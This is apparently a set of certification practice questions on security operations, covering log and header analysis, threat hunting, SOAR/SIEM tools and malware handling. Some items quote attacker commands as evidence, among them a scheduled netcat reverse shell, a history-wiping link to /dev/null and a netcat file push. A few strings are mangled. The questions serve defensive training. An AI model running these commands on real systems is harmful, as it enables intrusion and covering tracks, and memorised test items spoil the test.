  108. While reviewing email headers, Saanvi notices an entry that reads as follows:

    From: “John Smith, CIO” <[email protected]> with a Received: parameter that shows mail.demo.com [10.74.19.11].

    Which of the following scenarios is most likely if demo.com is not a domain belonging to the same owner as example.com?

    1. John Smith's email was forwarded by someone at demo.com.
    2. John Smith's email was sent to someone at demo.com.
    3. The headers were forged to make it appear to have come from John Smith.
    4. The mail.demo.com server is a trusted email forwarding partner for example.com.
  109. Fiona wants to prevent email impersonation of individuals inside her company. What technology can best help prevent this?
    1. IMAP
    2. SPF
    3. DKIM
    4. DMARC
  110. Which of the items from the following list is not typically found in an email header?
    1. Sender IP address
    2. Date
    3. Receiver IP address
    4. Private key
  111. Ian wants to leverage multiple threat flows and is frustrated that they come in different formats. What type of tool might best assist him in combining this information and using it to further streamline his operations?
    1. IPS
    2. OCSP
    3. SOAR
    4. SAML
  112. Cassandra is classifying a threat actor, and she describes the actor as wanting to steal nuclear research data. What term best describes this information?
    1. An alias
    2. A goal
    3. Their sophistication
    4. Their resource level
  113. During a log review, Mei sees repeated firewall entries, as shown here: 
    Sep 16 2019 23:01:37: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by
access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:38: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by
access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:39: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by
access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:40: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by
access-group "OUTSIDE" [0x5063b82f, 0x0]

    What service is the remote system most likely attempting to access?

    1. H.323
    2. SNMP
    3. MS-SQL
    4. Oracle
  114. While analyzing a malware file that she discovered, Tracy finds an encoded file that she believes is the primary binary in the malware package. Which of the following is not a type of tool that the malware writers may have used to obfuscate the code?
    1. A packer
    2. A crypter
    3. A shuffler
    4. A protector
  115. While reviewing Apache logs, Nara sees the following entries as well as hundreds of others from the same source IP address. What should Nara report has occurred? 
    [ 21/Jul/2019:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[ 21/Jul/2019:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[ 21/Jul/2019:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[ 21/Jul/2019:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
[ 21/Jul/2019:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[ 21/Jul/2019:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
    1. A denial-of-service attack
    2. A vulnerability scan
    3. A port scan
    4. A directory traversal attack
  116. Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where in the following image should she add a rule intended to block this type of traffic?
    A system architecture. It involves internet, firewall, router, layer 3 distribution switch, and windows 2019 server.
    1. The firewall
    2. The router
    3. The distribution switch
    4. The Windows 2019 server
  117. Cormac needs to lock down a Windows workstation that has recently been scanned using Nmap on a Kali Linux–based system, with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system's firewall for externally initiated connections?
    A window page presents the output.
    1. 80, 135, 139, and 445.
    2. 80, 445, and 3389.
    3. 135, 139, and 445.
    4. No ports should be open.
  118. Frank's team uses the following query to identify events in their threat intelligence tool. Why would this scenario be of concern to the security team? 
    select * from network-events where data.process.image.file = ‘cmd.exe’ AND data.process.parentImage.file != ‘explorer.exe’ AND data.process.action = ‘launch’
    1. Processes other than explorer.exe typically do not launch command prompts.
    2. cmd.exe should never launch explorer.exe.
    3. explorer.exe provides administrative access to systems.
    4. cmd.exe runs as administrator by default when launched outside of Explorer.
  119. Mark writes a script to pull data from his security data repository. The script includes the following query: 
    select source.name, data.process.cmd, count(*) AS hostcount
from windows-events where type = ‘sysmon’ AND
data.process.action = ‘launch’ AND data.process.image.file =
‘reg.exe’ AND data.process.parentImage.file = ‘cmd.exe’

    He then queries the returned data using the following script:

    select source.name, data.process.cmd, count(*) AS hostcount
from network-events where type = ‘sysmon’ AND
data.process.action = ‘launch’ AND data.process. image.file =
‘cmd.exe’ AND data.process.parentImage.file = ‘explorer.exe’

    What events will Mark see?

    1. Uses of explorer.exe where it is launched by cmd.exe
    2. Registry edits launched via the command line from Explorer
    3. Registry edits launched via explorer.exe that modify cmd.exe
    4. Uses of cmd.exe where it is launched by reg.exe
  120. Mateo is responsible for hardening systems on his network, and he discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?
    1. Enable host firewalls.
    2. Install patches for those services.
    3. Turn off the services for each appliance.
    4. Place a network firewall between the devices and the rest of the network.
  121. Deepa wants to see the memory utilization for multiple Linux processes all at once. What command should she run?
    1. top
    2. ls -mem
    3. mem
    4. memstat

    Use the following scenario and image to answer questions 122–124.

    While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop to see a graphical representation of system resource usage. She sees the information shown in the following image:

    A window page presents the memory utilization for multiple Linux processes.
  122. What issue should Amanda report to the system administrator?
    1. High network utilization
    2. High memory utilization
    3. Insufficient swap space
    4. High CPU utilization
  123. What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop?
    1. ps
    2. top
    3. proc
    4. load
  124. What command can Amanda use to terminate the process?
    1. term
    2. stop
    3. end
    4. kill
  125. While reviewing output from the netstat command, John sees the following output. What should his next action be? 
    [minesweeper.exe]
  TCP    127.0.0.1:62522        dynamo:0      LISTENING
[minesweeper.exe]
TCP    192.168.1.100        151.101.2.69:https  ESTABLISHED
    1. Capture traffic to 151.101.2.69 using Wireshark.
    2. Initiate the organization's incident response plan.
    3. Check to see if 151.101.2.69 is a valid Microsoft address.
    4. Ignore it; this is a false positive.
  126. What does EDR use to capture data for analysis and storage in a central database?
    1. A network tap
    2. Network flows
    3. Software agents
    4. Hardware agents
  127. While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured: 
    ln /dev/null ~/.bash_history

    What action was this user attempting to perform?

    1. Enabling the Bash history
    2. Appending the contents of /dev/null to the Bash history
    3. Logging all shell commands to /dev/null
    4. Allowing remote access from the null shell
  128. Charles wants to determine whether a message he received was forwarded by analyzing the headers of the message. How can he determine this?
    1. Reviewing the Message-ID to see if it has been incremented.
    2. Checking for the In-Reply-To field.
    3. Checking for the References field.
    4. You cannot determine if a message was forwarded by analyzing the headers.
  129. While reviewing the filesystem of a potentially compromised system, Marta sees the following output when running ls -la. What should her next action be after seeing this?
    A window page presents an output.
    1. Continue to search for other changes.
    2. Run diff against the password file.
    3. Immediately change her password.
    4. Check the passwd binary against a known good version.
  130. Susan wants to check a Windows system for unusual behavior. Which of the following persistence techniques is not commonly used for legitimate purposes?
    1. Scheduled tasks
    2. Service replacement
    3. Service creation
    4. Autostart registry keys
  131. Matt is reviewing a query that his team wrote for their threat-hunting process. What will the following query warn them about? 
    select timeInterval(date, ‘4h’), `data.login.user`,
count(distinct data.login.machine.name) as machinecount from
network-events where data.winevent.EventID = 4624 having
machinecount> 1
    1. Users who log in more than once a day
    2. Users who are logged in to more than one machine within four hours
    3. Users who do not log in for more than four hours
    4. Users who do not log in to more than one machine in four hours
  132. Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?
    1. grep
    2. more
    3. less
    4. strings
  133. Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on: 
    root       507  0.0  0.1 258268  3288 ?        Ssl  15:52   0:00 /usr/sbin/rsyslogd -n
message+   508  0.0  0.2  44176  5160 ?        Ss   15:52   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root       523  0.0  0.3 281092  6312 ?        Ssl  15:52   0:00 /usr/lib/accountsservice/accounts-daemon
root       524  0.0  0.7 389760 15956 ?        Ssl  15:52   0:00 /usr/sbin/NetworkManager --no-daemon
root       527  0.0  0.1  28432  2992 ?        Ss   15:52   0:00 /lib/systemd/systemd-logind
apache      714  0.0  0.1  27416  2748 ?        Ss   15:52   0:00 /www/temp/webmin
root       617  0.0  0.1  19312  2056 ?        Ss   15:52   0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root       644  0.0  0.1 245472  2444 ?        Sl   15:52   0:01 /usr/sbin/VBoxService
root       653  0.0  0.0  12828  1848 tty1     Ss+  15:52   0:00 /sbin/agetty --noclear tty1 linux
root       661  0.0  0.3 285428  8088 ?        Ssl  15:52   0:00 /usr/lib/policykit-1/polkitd --no-debug
root       663  0.0  0.3 364752  7600 ?        Ssl  15:52   0:00 /usr/sbin/gdm3
root       846  0.0  0.5 285816 10884 ?        Ssl  15:53   0:00 /usr/lib/upower/upowerd
root       867  0.0  0.3 235180  7272 ?        Sl   15:53   0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+   877  0.0  0.2  46892  4816 ?        Ss   15:53   0:00 /lib/systemd/systemd --user
Debian-+   878  0.0  0.0  62672  1596 ?        S    15:53   0:00 (sd-pam)
    1. 508
    2. 617
    3. 846
    4. 714
  134. Damian has discovered that systems throughout his organization have been compromised for more than a year by an attacker with significant resources and technology. After a month of attempting to fully remove the intrusion, his organization is still finding signs of compromise despite their best efforts. How would Damian best categorize this threat actor?
    1. Criminal
    2. Hacktivist
    3. APT
    4. Unknown
  135. While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred? 
    root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
> daemon:*:16820:0:99999:7:::
> bin:*:16820:0:99999:7:::
> sys:*:16820:0:99999:7:::
> sync:*:16820:0:99999:7:::
> games:*:16820:0:99999:7:::
> man:*:16820:0:99999:7:::
> lp:*:16820:0:99999:7:::
> mail:*:16820:0:99999:7:::
> news:*:16820:0:99999:7:::
> uucp:*:16820:0:99999:7:::
> proxy:*:16820:0:99999:7:::
> www-data:*:16820:0:99999:7:::
> backup:*:16820:0:99999:7:::
> list:*:16820:0:99999:7:::
> irc:*:16820:0:99999:7:::
    1. The root account has been compromised.
    2. An account named daemon has been added.
    3. The shadow password file has been modified.
    4. /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.
  136. Bruce wants to integrate a security system to his SOAR. The security system provides real-time query capabilities, and Bruce wants to take advantage of this to provide up-to-the-moment data for his SOAR tool. What type of integration is best suited to this?
    1. CSV
    2. Flat file
    3. API
    4. Email
  137. Carol wants to analyze email as part of her antispam and antiphishing measures. Which of the following is least likely to show signs of phishing or other email-based attacks?
    1. The email's headers
    2. Embedded links in the email
    3. Attachments to the email
    4. The email signature block
  138. Juliette wants to decrease the risk of embedded links in email. Which of the following solutions is the most common method for doing this?
    1. Removing all links in email
    2. Redirecting links in email to a proxy
    3. Scanning all email using an antimalware tool
    4. Using a DNS blackhole and IP reputation list
  139. James wants to use an automated malware signature creation tool. What type of environment do tools like this unpack and run the malware in?
    1. A sandbox
    2. A physical machine
    3. A container
    4. A DMARC
  140. Luis discovers the following entries in /var/log/auth.log. What is most likely occurring? 
    Aug  6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug  6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug  6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug  6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug  6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
Aug  6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
Aug  6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
Aug  6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
Aug  6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug  6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
    1. A user has forgotten their password.
    2. A brute-force attack against the root account.
    3. A misconfigured service.
    4. A denial-of-service attack against the root account.
  141. Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH?
    1. Add an iptables rule blocking root logins.
    2. Add root to the sudoers group.
    3. Change sshd_config to deny root login.
    4. Add a network IPS rule to block root logins.
  142. Azra's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command: 
    at \workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe

    What does it do?

    1. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30 p.m.
    2. It uses the AT command to dial a remote host via NetBIOS.
    3. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30 p.m.
    4. It creates a VPN connection to 10.1.2.3 every five days at 8:30 p.m. GST.
  143. While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries: 
    Aug  6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
Aug  6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6> 3
Aug  6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
Aug  6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug  6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]

    Which of the following has not occurred?

    1. A user has attempted to reauthenticate too many times.
    2. PAM is configured for three retries and will reject any additional retries in the same session.
    3. Fail2ban has blocked the SSH login attempts.
    4. Root is attempting to log in via SSH from the local host.
  144. Naomi wants to analyze malware by running it and capturing what it does. What type of tool should she use?
    1. A containerization tool
    2. A virtualization tool
    3. A sandbox tool
    4. A packet analyzer
  145. While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command: 
    nc -l -p 43501 < example.zip

    What happened?

    1. The user set up a reverse shell running as example.zip.
    2. The user set up netcat as a listener to push example.zip.
    3. The user set up a remote shell running as example.zip.
    4. The user set up netcat to receive example.zip.
  146. Susan is hunting threats and performs the following query against her database of event lots. What type of threat is she looking for? 
    Select source.name, destination.name, count(*) from network-events, where destination.port = ‘3389’
    1. SSH
    2. MySQL
    3. RDP
    4. IRC
  147. Lukas wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Lukas accomplish this for Windows workstations?
    1. Using application allowlisting to prevent all prohibited programs from running.
    2. Using Windows Defender and adding the game to the blocklist file.
    3. Listing it in the Blocked Programs list via secpol.msc.
    4. You cannot blocklist applications in Windows 10 without a third-party application.
  148. Ian lists the permissions for a Linux file that he believes may have been modified by an attacker. What do the permissions shown here mean? 
    -rwxrw-r&—1 chuck       admingroup      1232 Feb 28 16:22 myfile.txt
    1. User chuck has read and write rights to the file; the Administrators group has read, write, and execute rights; and all other users only have read rights.
    2. User admingroup has read rights; group chuck has read and write rights; and all users on the system can read, write, and execute the file.
    3. User chuck has read, write, and execute rights on the file. Members of admingroup group can read and write to the file but cannot execute it, and all users on the system can read the file.
    4. User admingroup has read, write, and execute rights on the file; user chuck has read and write rights; and all other users have read rights to the file.
  149. While reviewing web server logs, Danielle notices the following entry. What occurred? 
    10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200
    1. A theme was changed.
    2. A file was not found.
    3. An attempt to edit the 404 page.
    4. The 404 page was displayed.
  150. Melissa wants to deploy a tool to coordinate information from a wide range of platforms so that she can see it in a central location and then automate responses as part of security workflows. What type of tool should she deploy?
    1. UEBA
    2. SOAR
    3. SIEM
    4. MDR
  151. While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?
    A window page of Wireshark packet capture presents an extended session using the ESP protocol.
    1. An encrypted RAT
    2. A VPN application
    3. A secure web browser
    4. A base64-encoded packet transfer utility
  152. While reviewing indicators of compromise, Dustin notices that notepad.exe has opened a listener port on the Windows machine he is investigating. What is this an example of?
    1. Anomalous behavior
    2. Heuristic behavior
    3. Entity behavior
    4. Known-good behavior
  153. How does data enrichment differ from threat feed combination?
    1. Data enrichment is a form of threat feed combination for security insights, focuses on adding more threat feeds together for a full picture, and removes third-party data to focus on core data elements rather than adding together multiple data sources.
    2. Data enrichment uses events and nonevent information to improve security insights, instead of just combining threat information.
    3. Threat feed combination is more useful than data enrichment because of its focus on only the threats.
    4. Threat feed combination techniques are mature, and data enrichment is not ready for enterprise use.
  154. Which of the following capabilities is not a typical part of a SIEM system?
    1. Alerting
    2. Performance management
    3. Data aggregation
    4. Log retention
  155. Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?
    1. Use sha1sum to generate a hash for the file and write a script to check it periodically.
    2. Install and use Tripwire.
    3. Periodically check the MAC information for the file using a script.
    4. Encrypt the file and keep the key secret so the file cannot be modified.
  156. Alaina has configured her SOAR system to detect irregularities in geographical information for logins to her organization's administrative systems. The system alarms, noting that an administrator has logged in from a location that they do not typically log in from. What other information would be most useful to correlate with this to determine if the login is a threat?
    1. Anomalies in privileged account usage
    2. Time-based login information
    3. A mobile device profile change
    4. DNS request anomalies
  157. Megan wants to check memory utilization on a macOS-based system. What Apple tool can she use to do this?
    1. Activity Monitor
    2. MemControl
    3. Running memstat from the command line
    4. Running memctl from the command line
  158. Fiona is considering a scenario in which components that her organization uses in its software that come from public GitHub repositories are Trojaned. What should she do first to form the basis of her proactive threat-hunting effort?
    1. Search for examples of a similar scenario.
    2. Validate the software currently in use from the repositories.
    3. Form a hypothesis.
    4. Analyze the tools available for this type of attack.
  159. Tracy has reviewed the CrowdStrike writeup for an APT group known as HELIX KITTEN, which notes that the group is known for creating “thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel.” What types of defenses are most likely to help if she identifies HELIX KITTEN as a threat actor of concern for her organization?
    1. DKIM
    2. An awareness campaign
    3. Blocking all email from unknown senders
    4. SPF
  160. Micah wants to use the data he has collected to help with his threat-hunting practice. What type of approach is best suited to using large volumes of log and analytical data?
    1. Hypothesis-driven investigation
    2. Investigation based on indicators of compromise
    3. Investigation based on indications of attack
    4. AI/ML-based investigation
  161. Dani wants to analyze a malware package that calls home. What should she consider before allowing the malware to “phone home”?
    1. Whether the malware may change behavior.
    2. Whether the host IP or subnet may become a target for further attacks.
    3. Attacks may be staged by the malware against other hosts.
    4. All of the above.
  162. As part of her threat-hunting activities, Olivia bundles her critical assets into groups. Why would she choose to do this?
    1. To increase the complexity of analysis
    2. To leverage the similarity of threat profiles
    3. To mix sensitivity levels
    4. To provide a consistent baseline for threats
  163. Unusual outbound network traffic, abnormal HTML response sizes, DNS request anomalies, and mismatched ports for application traffic are all examples of what?
    1. Threat hunting
    2. SCAP
    3. Indicators of compromise
    4. Continuous threat feeds
  164. Naomi wants to improve the detection capabilities for her security environment. A major concern for her company is the detection of insider threats. What type of technology can she deploy to help with this type of proactive threat detection?
    1. IDS
    2. UEBA
    3. SOAR
    4. SIEM
  165. Ling wants to use her SOAR platform to handle phishing attacks more effectively. What elements of potential phishing emails should she collect as part of her automation and workflow process to triage and assign severity indicators?
    1. Subject lines
    2. Email sender addresses
    3. Attachments
    4. All of the above
  166. Isaac wants to write a script to query the BotScout forum bot blocklisting service. What data should he use to query the service based on the following image?
    A window page of BotScout presents a table that exhibit the date, name, email, IP, and from data.
    1. Email address
    2. Name
    3. IP address
    4. Date
  167. Syslog, APIs, email, STIX/TAXII, and database connections are all examples of what for a SOAR?
    1. IOCs
    2. Methods of data ingestion
    3. SCAP connections
    4. Attack vectors
  168. Yaan uses multiple data sources in his security environment, adding contextual information about users from Active Directory, geolocation data, multiple threat data feeds, as well as information from other sources to improve his understanding of the security environment. What term describes this process?
    1. Data drift
    2. Threat collection
    3. Threat centralization
    4. Data enrichment
  169. Mila is reviewing feed data from the MISP open-source threat intelligence tool and sees the following entry: 
    "Unit 42 has discovered a new malware family we've named
"Reaver" with ties to attackers who use SunOrcal malware.
SunOrcal activity has been documented to at least 2013, and
based on metadata surrounding some of the C2s, may have been
active as early as 2010. The new family appears to have been in
the wild since late 2016 and to date we have only identified 10
unique samples, indicating it may be sparingly used. Reaver is
also somewhat unique in the fact that its final payload is in
the form of a Control panel item, or CPL file. To date, only
0.006% of all malware seen by Palo Alto Networks employs this
technique, indicating that it is in fact fairly rare.", "Tag":
[{"colour": "#00223b", "exportable": true, "name":
"osint:source-type="blog-post""}], "disable_correlation":
false, "object_relation": null, "type": "comment"}, {"comment":
"", "category": "Persistence mechanism", "uuid": "5a0a9d47-
1c7c-4353-8523-440b950d210f", "timestamp": "1510922426",
"to_ids": false, "value": "%COMMONPROGRAMFILES%\services\",
"disable_correlation": false, "object_relation": null, "type":
"regkey"}, {"comment": "", "category": "Persistence mechanism",
"uuid": "5a0a9d47-808c-4833-b739-43bf950d210f", "timestamp":
"1510922426", "to_ids": false, "value":
"%APPDATA%\microsoft\mmc\", "disable_correlation": false,
"object_relation": null, "type": "regkey"}, {"comment": "",
"category": "Persistence mechanism", "uuid": "5a0a9d47-91e0-
4fea-8a8d-48ce950d210f", "timestamp": "1510922426", "to_ids":
false, "value":
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\
Shell Folders\Common Startup"

    How does the Reaver malware maintain persistence?

    1. A blog post
    2. Inserts itself into the Registry
    3. Installs itself as a runonce key
    4. Requests user permission to start up
  170. Isaac's organization has deployed a security tool that learns how network users typically behave and then searches for differences that match attack behaviors. What type of system can automatically analyze this data to build detection capability like this?
    1. Signature-based analysis
    2. A Babbage machine
    3. Machine learning
    4. Artificial network analysis
  171. What is the advantage of a SOAR system over a traditional SIEM system?
    1. SOAR systems are less complex to manage.
    2. SOAR systems handle large log volumes better using machine learning.
    3. SOAR systems integrate a wider range of internal and external systems.
    4. SOAR logs are transmitted only over secure protocols.
  172. Fiona has continued her threat-hunting efforts and has formed a number of hypotheses. What key issue should she consider when she reviews them?
    1. The number of hypotheses
    2. Her own natural biases
    3. Whether they are strategic or operational
    4. If the attackers know about them
  173. Nathan wants to determine which systems are sending the most traffic on his network. What low-overhead data-gathering methodology can he use to view traffic sources, destinations, and quantities?
    1. A network sniffer to view all traffic
    2. Implementing NetFlow
    3. Implementing SDWAN
    4. Implementing a network tap
  174. Adam is reviewing a Wireshark packet capture in order to perform protocol analysis, and he notes the following data in the Wireshark protocol hierarchy statistics. What percentage of traffic is most likely encrypted web traffic?
    A window page presents the Wireshark protocol hierarchy statistics.
    1. 85.9 percent
    2. 1.7 percent
    3. 20.3 percent
    4. 1.9 percent
  175. Annie is reviewing a packet capture that she believes includes the download of malware. What host should she investigate further as the source of the malware based on the activity shown in the following image from her packet analysis efforts?
    A window page presents the number, time, source, destination, protocol, length, and information data.
    1. 172.17.8.8
    2. 49.51.172.56
    3. 172.17.8.172
    4. 56.172.51.49
  176. Steve uploads a malware sample to an analysis tool and receives the following messages: 
    >Executable file was dropped: C:Logsmffcae1.exe
>Child process was created, parent C:Windowssystem32cmd.exe
>mffcae1.exe connects to unusual port
>File downloaded: cx99.exe

    If he wanted to observe the download behavior himself, what is the best tool to capture detailed information about what occurs?

    1. An antimalware tool
    2. Wireshark
    3. An IPS
    4. Network flows
  177. Abdul is analyzing proxy logs from servers that run in his organization and notices two proxy log servers have entries for similar activities that always occur one hour apart from each other. Both proxy servers are in the same datacenter, and the activity is part of a normal evening process that runs at 7 p.m. One proxy server records the data at 7 p.m., and one records the entry at 6 p.m. What issue has Abdul likely encountered?
    1. A malware infection emulating a legitimate process
    2. An incorrect time zone setting
    3. A flaw in the automation script
    4. A log entry error
  178. Eric is performing threat intelligence work and wants to characterize a threat actor that his organization has identified. The threat actor is similar to the group known as Anonymous and has targeted organizations for political reasons in the past. How should he characterize this threat actor?
    1. Unwitting insiders
    2. Unknown
    3. APT
    4. Hacktivist
  179. What do DLP systems use to classify data and to ensure that it remains protected?
    1. Data signatures
    2. Business rules
    3. Data egress filters
    4. Data at rest
  180. Benicio wants to implement a tool for all the workstations and laptops in his company that can combine behavioral detection attack indicators based on current threat intelligence with real-time visibility into the systems. What sort of tool should he select?
    1. An IPS
    2. An EDR
    3. A CRM
    4. A UEBA
  181. Eric wants to analyze a malware binary in the safest way possible. Which of the following methods has the least likelihood of allowing the malware to cause problems?
    1. Running the malware on an isolated VM
    2. Performing dynamic analysis of the malware in a sandbox
    3. Performing static analysis of the malware
    4. Running the malware in a container service
  182. Tom wants to improve his detection capabilities for his software-as-a-service (SaaS) environment. What technology is best suited to give him a view of usage, data flows, and other details for cloud environments?
    1. EDR
    2. CASB
    3. IDS
    4. SIEM
  183. Juan wants to audit filesystem activity in Windows and configures Windows filesystem auditing. What setting can he set to know if a file was changed or not using Windows file auditing?
    1. Set Detect Change
    2. Set Validate File Versions
    3. Set Audit Modifications
    4. None of the above
  184. Naomi wants to analyze URLs found in her passive DNS monitoring logs to find domain generation algorithm (DGA)–generated command-and-control links. What techniques are most likely to be useful for this?
    1. WHOIS lookups and NXDOMAIN queries of suspect URLs
    2. Querying URL allowlists
    3. DNS probes of command-and-control networks
    4. Natural language analysis of domain names
  185. Kathleen wants to ensure that her team of security analysts sees important information about the security status of her organization whenever they log in to the SIEM. What part of a SIEM is designed to provide at-a-glance status information using the “single pane of glass” approach?
    1. The reporting engine
    2. Email reports
    3. The dashboard
    4. The ruleset
  186. Lucca is reviewing bash command history logs on a system that he suspects may have been used as part of a breach. He discovers the following grep command run inside of the /users directory by an administrative user. What will the command find? 
    Grep -r "sudo" /home/users/ | grep "bash.log"
    1. All occurrences of the sudo command on the system
    2. All occurrences of root logins by users
    3. All occurrences of the sudo command in bash log files in user home directories
    4. All lines that do not contain the word sudo or bash.log in user directories
  187. Cynthia wants to build scripts to detect malware beaconing behavior. Which of the following is not a typical means of identifying malware beaconing behavior on a network?
    1. Persistence of the beaconing
    2. Beacon protocol
    3. Beaconing interval
    4. Removal of known traffic
  188. Eric has access to a full suite of network monitoring tools and wants to use appropriate tools to monitor network bandwidth consumption. Which of the following is not a common method of monitoring network bandwidth usage?
    1. SNMP
    2. Portmon
    3. Packet sniffing
    4. NetFlow
  189. Kelly sees high CPU utilization in the Windows Task Manager, as shown here, while reviewing a system's performance issues. If she wants to get a detailed view of the CPU usage by application, with PIDs and average CPU usage, what native Windows tool can she use to gather that detail?
    An illustration depicts the high CPU utilization in the Windows Task Manager.
    1. Resource Monitor
    2. Task Manager
    3. iperf
    4. Perfmon
  190. Roger's monitoring system provides Windows memory utilization reporting. Use the chart shown here to determine what actions Roger should take based on his monitoring.
    A window page of the memory capacity forecast chart depicts the Windows memory utilization reporting.
    1. The memory usage is stable and can be left as it is.
    2. The memory usage is high and must be addressed.
    3. Roger should enable automatic memory management.
    4. There is not enough information to make a decision.
  191. NIST defines five major types of threat information in NIST SP 800-150, “Guide to Cyber Threat Information Sharing.”
    1. Indicators, which are technical artifacts or observables that suggest an attack is imminent, currently underway, or compromise may have already occurred
    2. Tactics, techniques, and procedures that describe the behavior of an actor
    3. Security alerts like advisories and bulletins
    4. Threat intelligence reports that describe actors, systems, and information being targeted and the methods being used
    5. Tool configurations that support collection, exchange, analysis, and use of threat information

    Which of these should Frank seek out to help him best protect the midsize organization he works for against unknown threats?

    1. 1, 2, and 5
    2. 1, 3, and 5
    3. 2, 4, and 5
    4. 1, 2, and 4
  192. Deepa is diagnosing major network issues at a large organization and sees the following graph in her PRTG console on the “outside” interface of her border router. What can Deepa presume has occurred?
    A graph depicts the diagnosing major network issues at a large organization.
    1. The network link has failed.
    2. A DDoS is in progress.
    3. An internal system is transferring a large volume of data.
    4. The network link has been restored.
  193. Angela wants to use her network security device to detect potential beaconing behavior. Which of the following options is best suited to detecting beaconing using her network security device?
    1. Antivirus definitions
    2. File reputation
    3. IP reputation
    4. Static file analysis
  194. A server in the datacenter that Chris is responsible for monitoring unexpectedly connects to an offsite IP address and transfers 9 GB of data to the remote system. What type of monitoring should Chris enable to best assist him in detecting future events of this type?
    1. Flow logs with heuristic analysis
    2. SNMP monitoring with heuristic analysis
    3. Flow logs with signature-based detection
    4. SNMP monitoring with signature-based detection
  195. While reviewing his network for rogue devices, Dan notes that for three days a system with MAC address D4:BE:D9:E5:F9:18 has been connected to a switch in one of the offices in his building. What information can this provide Dan that may be helpful if he conducts a physical survey of the office?
    1. The operating system of the device
    2. The user of the system
    3. The vendor that built the system
    4. The type of device that is connected
  196. While checking for bandwidth consumption issues, Bohai uses the ifconfig command on the Linux box that he is reviewing. He sees that the device has sent less than 4 GB of data, but his network flow logs show that the system has sent more than 20 GB. What problem has Bohai encountered?
    1. A rootkit is concealing traffic from the Linux kernel.
    2. Flow logs show traffic that does not reach the system.
    3. ifconfig resets traffic counters at 4 GB.
    4. ifconfig only samples outbound traffic and will not provide accurate information.
  197. Vlad believes that an attacker may have added accounts and attempted to obtain extra rights on a Linux workstation. Which of the following is not a common way to check for unexpected accounts like this?
    1. Review /etc/passwd and /etc/shadow for unexpected accounts.
    2. Check /home/ for new user directories.
    3. Review /etc/sudoers for unexpected accounts.
    4. Check /etc/groups for group membership issues.
